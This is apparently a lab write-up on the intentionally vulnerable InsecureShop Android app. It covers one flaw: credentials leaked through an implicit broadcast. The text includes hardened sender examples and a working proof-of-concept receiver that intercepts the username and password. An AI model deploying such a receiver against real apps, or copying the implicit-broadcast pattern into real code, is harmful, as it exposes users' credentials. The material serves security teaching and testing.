Table of contents
- Vulnerability #9 - Using implicit intent to send broadcast with sensitive data
- Vulnerability #10 - Intercepting implicit intents to load arbitrary URLs
- poc writing
- Vulnerability #11 - Insecure implementation of SetResult in exported Activity
- Vulnerability #12 - Insecure Content Provider
- Bug #13 - Lack of SSL Certificate Verification
- Vulnerability #14 - Insecure Data Storage
- Bug #15 - Insecure Logging
Vulnerability #9 - Using implicit intent to send broadcast with sensitive data
1. Vulnerability analysis
AboutUsActivity.class
Here we can see that a broadcast is sent implicitly (addressed only by an action string, with no target component), and its payload is the username and password.
How is this onSendData triggered? Checking the source again, there is no direct call to it anywhere in the current source file.
The call is probably made elsewhere, so check the layout file activity_about_us.xml.
In the layout file, the onClick attribute of the button element is bound to the onSendData method.
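To make the flaw concrete, here is an added illustration (not InsecureShop's own code) of a sender modelled on the behaviour described above, next to a hardened version. The class name, the placeholder credential values and the signature-level permission name are assumptions for the example.

```java
import android.app.Activity;
import android.content.Intent;
import android.view.View;

// Hypothetical activity standing in for AboutUsActivity; credentials are constructed placeholders.
public class AboutUsSenderExample extends Activity {
    static final String ACTION = "com.insecureshop.action.BROADCAST";
    private String username = "demo-user";      // constructed value, the real app reads its prefs
    private String password = "demo-password";  // constructed value

    // Vulnerable: implicit broadcast. Every installed app whose receiver declares an
    // <intent-filter> for ACTION receives the credentials, no permission required.
    public void onSendDataVulnerable(View view) {
        Intent intent = new Intent(ACTION);
        intent.putExtra("username", username);
        intent.putExtra("password", password);
        sendBroadcast(intent);
    }

    // Hardened: same action, but setPackage() confines delivery to this app's own receivers,
    // so a third-party receiver registered for ACTION is never invoked.
    public void onSendDataFixed(View view) {
        Intent intent = new Intent(ACTION);
        intent.setPackage(getPackageName());
        intent.putExtra("username", username);
        intent.putExtra("password", password);
        sendBroadcast(intent);
    }

    // Alternative when another (trusted) app must receive it: require a signature-level
    // permission, declared in the manifest, so only apps signed with the same key qualify.
    public void onSendDataToTrustedApp(View view) {
        Intent intent = new Intent(ACTION);
        intent.putExtra("username", username);
        intent.putExtra("password", password);
        sendBroadcast(intent, "com.insecureshop.permission.CREDENTIALS"); // assumed name
    }
}
```

Even with the hardened sender, credentials should not travel in a broadcast at all; the point of the example is how to scope delivery when a broadcast is unavoidable.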
2. PoC writing
2.1 PoC Android APK with targetSdkVersion <= 25: declare the receiver in the manifest
If the target targetSdkVersion is <= 25
and you want to receive implicit broadcasts, you can register the receiver declaratively in AndroidManifest.xml:
```xml
<receiver
    android:name=".vul_broadcastReciever.MyReceiver"
    android:enabled="true"
    android:exported="true">
    <intent-filter>
        <action android:name="com.insecureshop.action.BROADCAST"/>
    </intent-filter>
</receiver>
```
MyReceiver.class
```java
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;

public class MyReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        if (intent != null) {
            String action = intent.getAction();
            if ("com.insecureshop.action.BROADCAST".equals(action)) {
                String username = intent.getStringExtra("username");
                String password = intent.getStringExtra("password");
                if (username != null && password != null) {
                    // Forward the received data to the activity via an explicit intent
                    Intent intent1 = new Intent(context, Vul_getDataFromBroadcast.class);
                    intent1.putExtra("username", username);
                    intent1.putExtra("password", password);
                    context.startActivity(intent1);
                }
            }
        }
    }
}
```
Vul_getDataFromBroadcast.class
```java
// Receive the data forwarded by the receiver
String username = getIntent().getStringExtra("username");
String password = getIntent().getStringExtra("password");
```